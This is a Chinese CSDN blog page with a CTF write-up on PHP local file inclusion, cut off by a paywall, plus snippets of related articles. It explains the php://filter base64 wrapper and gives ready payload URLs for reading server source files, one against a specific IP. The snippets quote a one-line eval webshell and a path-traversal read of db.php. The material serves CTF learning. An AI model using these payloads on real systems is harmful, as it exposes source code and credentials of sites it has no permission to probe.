php://filter(文件包含漏洞利用)

最新推荐文章于 2024-08-21 06:14:58 发布
最新推荐文章于 2024-08-21 06:14:58 发布
阅读量8.1k 收藏 14
点赞数 5
分类专栏: 做题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MIGENGKING/article/details/102527374
版权
本文探讨了PHP文件包含漏洞的一种利用方式,通过`php://filter`协议来读取并编码本地文件。介绍了`php://filter/read=convert.base64-encode/resource=index.php`的使用方法,以及在攻防世界Web-ICS挑战中的应用。攻击者可以通过解码base64编码获取文件源码,进一步寻找系统后门。文章提到了preg_replace函数的参数和利用过程,包括设置HTTP头参数`X_FORWARDED_FOR`,并通过修改URL执行不同的系统命令来遍历和查看文件。
摘要由CSDN通过智能技术生成

“网址+/index.php?page=php://filter/convert.base64-encode/resource=index.php“

例如:
http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

首先这是一个file关键字的get参数传递,
php://是一种协议名称,php://filter/是一种访问本地文件的协议,
/read=convert.base64-encode/表示读取的方式是base64编码后,
resource=index.php表示目标文件为index.php。

扩展:
"php://filter"是一种原封装器,设计用于数据流打开时的筛选过滤应用。

这对以一体式(all-in-one)文件函数非常有用,类似readfile(),file(),file_get_contens(),在数据流内容读去之前没有机会应用其他过滤器。

“php://filter”目标使用以下的参数作为它路径的一部分,复合过滤链能够在一个路径上指定.

在这里插入图片描述

攻防世界web-ics
题目描述:
其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统

打开题目链接查看,题目中除了设备维护中心有一些提示,查看源代码也没有啥收获,,不过比赛的时候会有相关提示,现在我还太菜了

最低0.47元/天 解锁文章
MIGENGKING
关注
  • 5
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
文件包含中过滤了php,文件包含漏洞---php协议
weixin_32480335的博客
03-21 721
一、原理1、概念:在php代码中,总会有一些代码我们会经常用到,这时引入了文件包含函数,可以通过文件包含函数把这些代码文件包含进来,直接使用文件中的代码,这样提高了我们的工作效率。2、文件包含函数:include():如果发生错误,会产生一个警告然后继续执行脚本include_once():与include()相同,如果文件之前被包含过则不再包含require():会停止执行代码require_o...
浅谈php://filter的妙用
01-02
php://filterPHP中独有的协议,利用这个协议可以创造很多“妙用”,本文说几个有意思的点,剩下的大家自己下去体会。本来本文的思路我上半年就准备拿来做XDCTF2016的题目的,没想到被三个白帽的一题抢先用了,我也就只好提前分享一下。 XXE中的使用 php://filter之前最常出镜的地方是XXE。由于XXE漏洞的特殊性,我们在读取HTML、PHP等文件时可能会抛出此类错误parser error : StartTag: invalid element name 。其原因是,PHP是基于标签的脚本语言,<?php … ?>这个语法也与XML相符合,所以在解析XML的时候会被误认为
文件包含漏洞全面详解
weixin_42340783的博客
08-07 1305
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
PHP文件包含fillter,利用php : //filter进行文件包含漏洞利用
weixin_34363835的博客
03-11 193
说实在话,使用PHP已有10年了,但从没研究过php://filter功能。今天一个偶然的机会,看到了一篇文章 LFI’s Exploitation Techniques,其中描述了如何利用php://filter进行文件包含漏洞利用的。这才对php://filter进行研究。在php的官方文档中有对php://filter说明,具体内容如下:具体使用方法如下:/* 这会以大写字母输出 www.e...
php://filter技术分享
Pz_mstr's Blog
10-13 4421
0x00 前言php://filterPHP中的一个协议,利用这个协议我们可以解决一些ctf的题目,或者挖掘出一些漏洞。0x01 php://filterphp://filter可以作为一个中间流来处理其他流,具有四个参数: 名称 描述 备注 resource=<要过滤的数据流> 指定了你要筛选过滤的数据流。 必选 read=<读链的筛选列表> 可以设定一个或多个过滤
php://filter
2202_75317918的博客
04-12 3129
php://filter
php://filter/
小龙在线
09-07 736
php://filterphp中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字filter可以很容易想到这个协议可以用来过滤一些东西。
php input 漏洞,php://input,php://filter,data URI schema的那些事
weixin_36400833的博客
03-11 1699
一、php://input一句话木马在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)@eval(file_get_contents('php://input'))我是个十足的php菜鸟,只有用到的时候才会去查查语法书,对php://input也只是有点印象而已,于是用...
学习日志9:XXE+php://filter绕过WAF读内网文件
m0_37622973的博客
09-08 1409
摘自freebuf 出处:https://www.freebuf.com/vuls/211822.html 基础知识: 1.php://filterphp中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;使用不同的参数可以达到不同的目的和效果:其中resource=<要过滤的数据流>,指定了要筛选过滤的数据流 2.php的data://text/plain;b...
php filter base64,通过php://filter/read=convert.base64-encode/resource= 利用LFI来查看源码
weixin_32446485的博客
03-11 1507
PHP LFI读php文件源码以及直接post webshell2013-08-17 15:25:15|分类: 安全 |字号订阅最近在忙defcon的题目集训其中有一套题目里有个老外写的writeup中提到了LFI的另一种小技巧原文请参考http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/PS:该...
php://filter(文件包含漏洞利用)及php://input
Sea_Sand息禅
11-17 5853
1. php://filter 文件包含漏洞:https://blog.csdn.net/fageweiketang/article/details/80699051 筛选过滤应用: 1、 字符串过滤器: string.rot13 对字符串执行ROT13转换 string.toupper转换为大写 string.tolower 转换为小写 string.strip_tags去除...
php://filter(文件包含漏洞利用)及php://input(转载)
知足且坚定,温柔且上进
02-08 1250
php://filter 文件包含漏洞:https://blog.csdn.net/fageweiketang/article/details/80699051 筛选过滤应用: 1、 字符串过滤器: ·string.rot13 对字符串执行ROT13转换 ·string.toupper转换为大写 ·string.tolower 转换为小写 ·string.strip_tags去除html和p...
PHP文件包含fillter,2. 文件包含(150)
weixin_39934085的博客
03-11 171
文件包含 (150)-------南京邮电大学ctf : http://4.chinalover.sinaapp.com/web7/index.php从这道ctf的网址 :http://4.chinalover.sinaapp.com/web7/index.php?file=show.php我们明显感受到了文件包含的信息文件包含漏洞,先了解一下php://filterphp://filter 是一...
PHP 过滤器
最新发布
wjs2024的博客
08-21 460
PHP 过滤器是 PHP 语言内置的一组功能,用于处理和验证数据。它们可以检查数据是否满足特定的条件,如是否为有效的电子邮件地址、数字、字符串等,并对数据进行清理,以防止 SQL 注入、跨站脚本攻击(XSS)等安全风险。PHP 过滤器通常与输入数据绑定使用,确保数据在进入应用程序之前是安全可靠的。PHP 过滤器是确保应用程序数据安全和准确性的重要工具。通过使用过滤器函数和过滤器链,开发人员可以轻松地验证和清理数据,防止各种安全风险。
php filter 漏洞,php://filterphp漏洞中的利用 -电脑资料
weixin_39778106的博客
03-17 209
1、php://filter基础php.net中的描述,http://php.net/manual/zh/wrappers.php.phpphp.net中两个基本的例子:/* 这会以大写字母输出 www.myhack58.com 的全部内容 */readfile("php://filter/read=string.toupper/resource=http://www.myhack58.com"...
php://filter 的使用
热门推荐
hhh
09-03 2万+
今天做bugku的基础题遇见的……很神奇,真心涨姿势(好吧其实我现在每做一道题都是涨知识) 题目:flag在index里 链接:呼哈哈 题解: 可以看到题目打开的界面里 注意这里:?file=show.php;可以联想到文件包含漏洞,然后我们就可以用php://filter协议来查看源文件内容; 构造:php://filter/read=convert.base64-encode/...
代码审计:php://filterphp漏洞中的利用
cherrie007的博客
07-17 1063
1、php://filter基础   php.net中的描述,http://php.net/manual/zh/wrappers.php.phpphp://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和file_get_contents(),在数据流内容读取之前没有机会应
php://filter/read=convert.base64-encode/resource=使用场景
08-29
引用和提到了使用php://filter/read=convert.base64-encode/resource=来访问数据流并将其转换为base64编码。这个功能可以在一些特殊场景下使用,比如在文件包含漏洞或路径遍历漏洞中,通过构造恶意的URL参数来读取服务器上的文件内容。 在引用中的示例中,我们可以看到通过构造URL参数php://filter/read=convert.base64-encode/resource=../sqli/db.php来读取sqli目录下的db.php文件内容,并且将其以base64编码的形式返回。 因此,php://filter/read=convert.base64-encode/resource=可以用于读取服务器上的文件内容,并将其转换为base64编码后返回。这在一些特定的场景中可能是有用的,比如进行文件包含漏洞的利用或进行路径遍历漏洞的探测。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [PHP伪协议filter详解,php://filter协议过滤器](https://blog.csdn.net/wangyuxiang946/article/details/131149171)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [通过php://filter/read=convert.base64-encode/resource= 利用LFI来查看源码](https://blog.csdn.net/weixin_32446485/article/details/115546564)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值